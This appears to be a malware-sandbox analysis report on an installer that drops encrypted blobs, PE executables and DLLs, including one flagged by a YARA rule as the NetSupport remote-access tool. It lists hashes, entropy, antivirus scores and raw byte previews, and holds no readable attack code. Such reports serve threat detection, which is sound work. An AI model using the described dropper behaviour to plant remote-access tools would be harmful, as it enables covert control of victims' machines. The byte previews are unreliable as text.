                                                                                                                                                                              Preview:......6.....YY^..^......3.@;.u.......t.2..U..}..VW..C....}...u..}.V.u.W.u.j.u%h......T.I...~....u.;...x......_^]...h......y..u....y...A..@.t.@..U..SW..3.9_.u..u.........G._[]...8_.u.Vj..H.....Y.u...^..}4...^..G.....#G..F..w.^...u..O......_..S..QQ......U.k..l$.......SVW.M.3.h.....M.f.......e...3..E...C..0V.4..)K...q..YY..t.G..a|.u...a........`w..$...A.......P.K..^...3..}.M.......E._^[..]..[...h..I..K...............s.......3..F......>.I...E...E...E...E...E...E...E...E...E...E...E...E...E...E...E...E...E...E...E...E...E.#.E.'.E.+.E./.E.3.E.7.E...E.;.E.X.E.w.E...A...E.O.E...E...E.3.E.".E.>.E.O.E.k.E...E...E...E...E.Z.E.v.E...E...E...A...E...A...E...E.0.E.:.E.h.E.s.E.-.E...E...E...E...E...E...E.r.E...E...E...E.|.E...A...E...E...E.6.E.J.E...E...E...E.R.E...E...E...E.!.E.7.E.M.E.c.E...E...A...A...E.y.E...E...E...A...E.}.E.f.A.f...f..0f;......y..u....y...A.t..@..V.......j.V.v...YY..^...Wj@.04M.3.Y...!.05M..._.U..QQS.].V.u.W...E..F..U..M....f.x.3.......e...M.j.Q.0.......
                                                                                                                                                                              Process:C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):79872
                                                                                                                                                                              Entropy (8bit):7.997942528078247
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:1536:wi0cZlTOuyJt1g/3vW/WQMWYYxGJkFYIeZvJsZjhG7tra2ZGtWC:TlTKJt1gf2MCUJkqIYviAtra2AkC
                                                                                                                                                                              MD5:D007B328A7E67AAC5420453408D25C0E
                                                                                                                                                                              SHA1:60C95E6455373FADEF904E9A880C52EF3CA77B8E
                                                                                                                                                                              SHA-256:166E0A74F3D585B17EAC4E3B31C98EDF649F1B03ED8560A94713D71CF2D932FF
                                                                                                                                                                              SHA-512:A8A4200976BB949C0836E2AD6BC328B4CAEADA4E14B79AB63FC2FB1C132EF0B2ABA0BADF89095BF77E5CC5F379939673C4A6E5EC51636940D22C593908347B3D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.o.w..~`A...kH0..m.O.H..4.M...$..i.I.Q.<k........"T....m_RN.R.....2K^......`Y.nw.{vu.....^... PT.M[..\(..)........".Yw.gN]7..!......lK...n5*....._..$4(/^.e=f@......pA..6.:G.9....g..c...K...M;..w..+..&..pn.i&..J..}..l.........h'."..|..._....%!.'?..~.%.u(..8......Ch.#.H.t..#v_?.~..<x.....0...6......Q.t.w..?2.=.,v...I.)......X.$.....8".".b=......Kc.r.(..j0cZ|Q.r..._.....5.0..=..\.B..z...Ta6.Z~...Mk..D(.Q..7G..].k...7e$.6..._..DjB..A,Bo...[.[U.9.j.-g^w.N...... j...>.......!B........H.0.uI.r7...X..k....R.W.&o. ..zc.....&..0..M.......)..z.......O7W..|.-.n...L.'*.m..z.jG..px...<....E..Z.4.x.MP..e_..u9.'F...;S.l.$..s-...y......Ds..X..p.n......8.2.V......x_g....E>w..,.v........=.e.......{.....>..9....C.rm?.D6..x..Rc.P.<.K@...V.{Rp.f.5.)...w..t.+N...N{.&...@O....ALP.(g.6=.^$H....?Y.k...)"...;.J+xB...._.)...4..7E....!..48U.%..'g...AE3.~.\....WP>.j..=b.."+..6.?.....e....L.B.5.V6......8..!k.9.:.A..([......od..:..b(8c...0L..a.$.l.a...1..z..W...
                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):124928
                                                                                                                                                                              Entropy (8bit):6.625425277541543
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:BnEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVnBypIX:BnEo3tb2j6AUkB0CThp6vmVn/
                                                                                                                                                                              MD5:490590D7099C402F4614B5CF00004420
                                                                                                                                                                              SHA1:E3060C0F79C55E18DE28E3AEB8529901938D5292
                                                                                                                                                                              SHA-256:2A7AFBF76ABCC1D5917CF011B016C2C4C915D7F8B263BBF74A09060DBEDE9418
                                                                                                                                                                              SHA-512:703F9A0D1AA47091A90D507F72CD35F83CAA402CB10B8DAFC3945562DB6DBB05A76CE78F9F93D17EF94866055F95D0BC3A70B9CA95011B9B5401D44F86872491
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:YP.D$DP....I..G..t$....t0...t....u>.w..D$DP.4...YY.(.w..D$DP....YY..t....w..D$DP.w...........u.F.G..u,h.....D$DP.u.....I..D$@Ph4mL......YY..u..t$..O.C.........h.....D$DP.u...t.I..D$@P.L$$.*_...O4.D$ ;.t.P..j...O4.A..A..A...L$ .ri...O4.G....t/.G..u(h.....D$DP.u.....I..D$@Ph4mL..H...YY..t.F.O.C...tYh.....D$DP.u.....I..D$@P.L$4.^...Ol.D$0;.t.P.=j...Ol.A..A..A...L$0..h...Ol..G....t.F.O.C...t.;.u..u..........t.F.O.C......tk.D$.P.u.....I..O...y..D$.9.....u.FC.T$.......t.9.....u.FC......t..D$.+D$.9.....u.FC......t..D$.+.9.....u.FC.. t.;.u.............;.....u.FC;.u..E.P.......O.............t.3...3.@_^[..]...U..V..~(.t..u........u.Vh.UF..u.........|.I........u.2.....^]...U..M.].....U..QSVW.u.....P.I...u..{........3.PPj..u...H.I..E...u.......E..p.3.j.Z...........Q.7...Y..WVj..u...H.I..M.3.f..O....3.F.,8S.u.W.b...YPW....I..s$W....YY..t.......3.W....Y....W....Y3.@_^[....V...6..l..j.V.}...YY..^...U..W...O...0.I...t.V.q8Q.......u.^.E..t.j.W.C...YY.._]...U.....U.SV..3.u.W...~....N(.N0.N4
                                                                                                                                                                              Process:C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):36038
                                                                                                                                                                              Entropy (8bit):7.994518180793861
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:768:DgT1WuuwDwOKYF15yfWJTkKR1w4eU9sjYDGufV7WLdg:Dg5WUDwLfWmKR1A+sjMGG8O
                                                                                                                                                                              MD5:FE57C7DDE39E57445EEFDCB89031E551
                                                                                                                                                                              SHA1:EEBC5A8465A5DCA39B46904A6A0B4A64B9A1ADF5
                                                                                                                                                                              SHA-256:8628B0894A5EE5600649D3054B4CEDE4D30201442D1FD34BAB007B8AD92C4F75
                                                                                                                                                                              SHA-512:7E27D8B333F9F8D7C19B4D640B0F3824045D39C238B60427F960902511B02AA4B3746F063B2E921F0D5B4DE9ABFEB8CC915164504E5EE92E56595C3D847F9654
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:i..4M..(.(L..;.Ha.....xK..6....W=..?.].?k..&....I.VQe..v.!.l?.l..d.W........H..i.n.T..5...ay(f..Z.D...U..M.P..@...c...i.{.]n.{}m!Gm.7..$r.g2.q8.0.....E...*'.3.u.b).%sT.:.m@.1..c.....?..c..\..4...).......O...Q..k.O..2.#V)>..kM.......y..2....Rxh'...6......S.3_6....GhI..y..1.&w..t..&.....&...o.E.m......--.._.v.S......B....G.U..j..}=fS_..(.)FI+X..........p.rD.;...Bsl.uu..tA.......;..LIn.}p..[.....=.U.qu..........i`-..9]Z\..r..2.c.t.u\9.C=.o.O....^.H{W......).....I.....C....T.o$...O-......-?x>(.Q..!....u..@.k.-Y....}..,.......:...p...P.?._....._.:B1.Br.{..QB./>.8f@.I=U*&.?<.f.q'.0{".....M....S...j..P1..T3..5%P.7_`,..<.e...<.:..v.1...=a...yT....BE..F...3._..u...4.(c^...^w.K.yg.h...BB...xF[q......Y.3..T#.3,.ne..a..s.W..>.....K..~...YT..5..I.z.Q.N..;.Q:.......t.+.4.T./&E[.Z.9...8?W..:...7....?xR...{...._.%;.y..E.m..&.J...Z.<.cA..,-B.3k...../......`wD-6I...,*... ..1......+.F....y.j.~S\...5l.M......_.l.}PQ....b....p....w..W..`2.)..!.......%[s....e.
                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):101376
                                                                                                                                                                              Entropy (8bit):6.60309115168509
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:rv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jM:LphfhnvO5bLezWWt/Dd314V14ZgP0d
                                                                                                                                                                              MD5:137079AF2899310647BD0D4DC68D2E93
                                                                                                                                                                              SHA1:5946B5A03B7083B26242D3B81CC630523719CC07
                                                                                                                                                                              SHA-256:E2707F0B325FB1F3A855A6F11CAF45550CB5BFB9969A48EDA02303AE09E5449F
                                                                                                                                                                              SHA-512:4495CBEC0AA29A208AB4F0210E9491B5BF3BE827981577BEAEEECDF44829B821178B673E77A50F765FE40376168FB8C9060C3BC2B557F77BCC7DEFD0F6665CDA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:....H.....@..}..]..E..{...~.=......P....I.f.C........H..|1...D1.t..@8.@......|1...D1.t..@8.@..2._^[....U..QQ.E.S.].V.u.W.#....C..............E.i.....+.i......E..E.P3.P8E.t.SP..PSP....I.....u!8E.tu...H..|9...D9.t..@8.@.L'...G~)S.u.....I...uI..j.^.H..|9...D9.t..@8.p.....$.I....I..|9...T9.t..R8.B..|9...D9.t..@8.@.._..^[....U..QQSW....3.E.QQ.x.GW.0j.Q....I..E...u.......@V3.j.Z.........Q....Y.u....E.VW.0j.j.....I.H..Pj.V.YK..V....Y^_[..U..}..V..u.QQ......g.u...S..Y.N..F......~7.B.j........Y.......F..F....u.j.X........P.F..'...Y....P...2....F.@P.u..6. ......^]...U..VW.}.....Q..A...t..B...t..P.;.u...;N.u..V.Q.e....'..N._^]...U..QQSW....3.E.QQ.x.QQGW.0QQ....I..E...u........3VP....Y3...E.QQ.u.VW.0QQ....I.HPQV...(...V.h...Y^_[..U..E.Pj..u..u..u..8......p....Q.wR.......y....].U..E..@....y..u....I.....u.V.u....&....&..F.....^3.]...U......DS.].V...W.t$......3.3.G..P.{..D$...p.I.;.u...t.I..D$ P..l.I..]..d$(..d$,.j.Xf.D$ .C......................tq.....j....C..p....O...F....D$..C..p..
                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):149504
                                                                                                                                                                              Entropy (8bit):5.684948439111906
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:ASfuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPS:ATq8QLeAg0Fuz08XvBNbjaAtsPS
                                                                                                                                                                              MD5:6B51A5DA97530A7AE324C3C9F88C8924
                                                                                                                                                                              SHA1:238A7540DB2B5690C99887ADE3507560535BE2C4
                                                                                                                                                                              SHA-256:E7CEECA8A39642EC6997FE0E19E9D22DDB916AA2C55D19E7ED52B88372F4AFC7
                                                                                                                                                                              SHA-512:9DC6120E77B9B2AB364B1566F9F8104DB72574EAB4FF832D87B81E64EC16848D835C92A6E2484428C675A45B964FDB410EA28E4EB5D672603F5019236F770DB8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:..v...j...^.........................................(...:...F...N...d...z....................................".......:...N...h...x.................................... ...4...P...b...t.........................n...............*...>...T...p....................................(...@...P...^...t................................&...B...`............................. ...8...J...\...r..................................."...*...@...N...Z...n............................V...J...:...*........................................................*...<...V...l...x...........................................(...2...D...V...f...x....................................... ...2...D...^...x..................x...^...H...2....... ...........................................'...........%...).......................................M...&...........................................h...R...>...(....................................... ...6...F...V...h...v....................................,...:.
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):264504
                                                                                                                                                                              Entropy (8bit):4.2616300266171105
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:KNGdfE7k4pzco2V0lyurfRZBGb052Vqa9/QkHq6KT8W8LI1LWFznKM+psOKrjG5v:KNubVGu57nUQG0HZSBTjZGmDbKzu7Axc
                                                                                                                                                                              MD5:0AC98A4BFC717523E344010A42C2F4BA
                                                                                                                                                                              SHA1:7967769EE63B28FC8BEC14854A4A0A71BDA6B3F2
                                                                                                                                                                              SHA-256:68546336232AA2BE277711AFA7C1F08ECD5FCC92CC182F90459F0C61FB39507F
                                                                                                                                                                              SHA-512:8A5F4F19C24C24A43D9D18A8935613AD6A031B8F33D582767A2407665F1FF39A403DDAEECBF4F22A58759FCD53F81F4392192CA9FA784FF098A6C995509F9547
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5Q..q0..q0..q0..eO~.p0..q0..p0..eO..p0..Richq0..........PE..L......d...........!...$............................................................./....@.......................................... .. ...............8)...........................................................................................rdata..............................@..@.rsrc... .... ......................@..@.......d........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .. +...rsrc$01.... K.......rsrc$02............................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):268600
                                                                                                                                                                              Entropy (8bit):4.285774017645798
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:yNbT+wDopP25xej01K1+KnohMEDdQPfYBRL37KCxr:gbiwo25xwKhTDd80Rp
                                                                                                                                                                              MD5:41C75E831A5571C3F72287794391A0E6
                                                                                                                                                                              SHA1:0FE7A9A3C905D0376001A5C46EDFC0000FA82BD4
                                                                                                                                                                              SHA-256:B3AD99AFDAEE3B9365E7A3FFCC44C2761E22A4F92DFF5E5EFDC52F6B08EA0105
                                                                                                                                                                              SHA-512:D3D03F3308DB1862522127300127839AA44828D29622DB20AEA71E6A80A51247654E380D7A0126361D85774137826FC345AE368335BB1EA9C1C8995721DAF432
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5Q..q0..q0..q0..eO~.p0..q0..p0..eO..p0..Richq0..........PE..L......d...........!...$............................................................9.....@.......................................... ..................8)...........................................................................................rdata..............................@..@.rsrc........ ......................@..@.......d........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .. +...rsrc$01.... K.......rsrc$02............................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):391832
                                                                                                                                                                              Entropy (8bit):6.788660116314725
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:/0pwbUb486Yu0LIFZf4TktH4aY384az44lstAZPVJ4hPueU12jXvbJaS0T9XjJpX:8pwbUb48Ju0LIFZf4Tk2aY3FasNAZtJp
                                                                                                                                                                              MD5:405A7BCA024D33D7D6464129C1B58451
                                                                                                                                                                              SHA1:22B64E211D96D773C510AC82E7A73F8DEBF4E4CD
                                                                                                                                                                              SHA-256:092C3EC01883D3B4B131985B3971F7E2E523252B75F9C2470E0821505C4A3A83
                                                                                                                                                                              SHA-512:3C8D4CBF377A8BEB793C93B63D521CCD75167DEC02DA43BB91434CB6B0737CA2D61FA201F2825FD1A0CEAAE768BB53D78F737E7C412AAE83D3CDC748893F31E6
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\Desktop\installer_1.05_36.4\TCCTL32.DLL, Author: Joe Security
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...;..U...........!......................................................................@.............................o...T...x....0..8....................@..`E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...8....0......................@..@.reloc..&F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1084064
                                                                                                                                                                              Entropy (8bit):7.972549945523473
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:XxV7sidAl5JCm0LJuKEol0d6jLc2WCZhk7ztdZ67eplkbyM5Kd0I4/tEww3Fo:hRdA575KFj9Dhk7l3knk6IkY1o
                                                                                                                                                                              MD5:911D5567537C6BB8413884309387BB54
                                                                                                                                                                              SHA1:4FB952A1E2AAC681BEE9A456F6AD13E55ADC9522
                                                                                                                                                                              SHA-256:24D8C5EF81F9C9A17EABB906829B89CF8680C49AF58ABF4BA3E743302C03C378
                                                                                                                                                                              SHA-512:9BDDDA1BAF1FAFC7114FEFFD48B5919C0432E8C36987E2FC40143F88B1E9A302BFA639F17200382E6BF9B525225AA84B4D9D19A59F34AEB51752BAE6DF4E68F0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@.......................................@.................................@........................e...$...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...............................@..@.reloc...............F..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):20923392
                                                                                                                                                                              Entropy (8bit):6.255903817217008
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:393216:LIckHor5uLnn83wAP5hxOZEa7/LzRuDFqILn5LgcKyZyQXt+8M:yEZbv
                                                                                                                                                                              MD5:7DBC97BFEE0C7AC89DA8D0C770C977B6
                                                                                                                                                                              SHA1:A064C8D8967AAA4ADA29BD9FEFBE40405360412C
                                                                                                                                                                              SHA-256:963641A718F9CAE2705D5299EAE9B7444E84E72AB3BEF96A691510DD05FA1DA4
                                                                                                                                                                              SHA-512:286997501E1F5CE236C041DCB1A225B4E01C0F7C523C18E9835507A15C0AC53C4D50F74F94822125A7851FE2CB2FB72F84311A2259A5A50DCE6F56BA05D1D7E8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.@..............'.......'.......'..[...........|.-.....|.+.*...|.*.<....'......../.....q.*.....q.+....q.&.^...q.......q.,.....Rich............PE..d....._W.........." .....(....b.....|&....................................... E...........`.........................................0.1.t.....1...............9.`n............C..k.. . .T..................... .(..... ..............@...............................text...T&.......(.................. ..`.rdata..XvO..@...xO..,..............@..@.data....;....1.......1.............@....pdata..`n....9..p...D3.............@..@.gfids.......pC.......=.............@..@.tls..........C.......=.............@..._RDATA........C.......=.............@..@.reloc...k....C..l....=.............@..B................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):18578896
                                                                                                                                                                              Entropy (8bit):6.451339218330448
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:393216:PXhbUNnoBP98OQ//aXUszfTBHCOUZ2UenCDkOH2:PXhNB4nlW
                                                                                                                                                                              MD5:0A84667145E7EFEF026C888D4B768126
                                                                                                                                                                              SHA1:27673E1BD7C55BBA6EAA37620D3B3820CE45D46A
                                                                                                                                                                              SHA-256:DD575F3C64382193610815909BD2C52490244ECBBB9BBA6EEF5FE4F0BB43BB4D
                                                                                                                                                                              SHA-512:3E964C996ED358787C4DFDB965A00B38B4118C804AE1BF8D32AEB7D936584E72C188E3FA0D27D1C2FFD3BE13DCA8045B08B28B15070812C195D82D1BF23A2604
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hX2.,9\.,9\.,9\.%A.49\.wQY.-9\.....+9\..TX.&9\..T_.'9\..T].*9\.wQX.)9\.wQZ.(9\..TY..9\.CO.-9\..k..(9\.wQ]..9\..PY.e9\.C]Z.-9\.@QX.*9\.C]]."9\..gX.\9\..PX..;\.CO../9\.,9].T:\..gY.t8\..PY.'9\..PY.)9\.,9\.49\..WY.k9\..W\.-9\..W..-9\.,9.-9\..W^.-9\.Rich,9\.................PE..d...K..d.........."...........r......S.........@..........................................`.................................................<...p....P,.xh....#.,....D...9....,.$... '..T...................x'..(...0...................@...L...@....................text............................... ..`.uedbg..0........................... ..`.rdata....=.......=.................@..@.data.....)..@......................@....pdata..,.....#.....................@..@_RDATA...#... ,..$..................@..@.rsrc...xh...P,..j...&..............@..@.reloc..$.....,.....................@..B................
                                                                                                                                                                              Process:C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):97160
                                                                                                                                                                              Entropy (8bit):6.422776154074499
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:yDHLG4SsAzAvadZw+1Hcx8uIYNUzUnHg4becbK/zJrCT:yDrfZ+jPYNznHg4becbK/Fr
                                                                                                                                                                              MD5:11D9AC94E8CB17BD23DEA89F8E757F18
                                                                                                                                                                              SHA1:D4FB80A512486821AD320C4FD67ABCAE63005158
                                                                                                                                                                              SHA-256:E1D6F78A72836EA120BD27A33AE89CBDC3F3CA7D9D0231AAA3AAC91996D2FA4E
                                                                                                                                                                              SHA-512:AA6AFD6BEA27F554E3646152D8C4F96F7BCAAA4933F8B7C04346E410F93F23CFA6D29362FD5D51CCBB8B6223E094CD89E351F072AD0517553703F5BF9DE28778
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
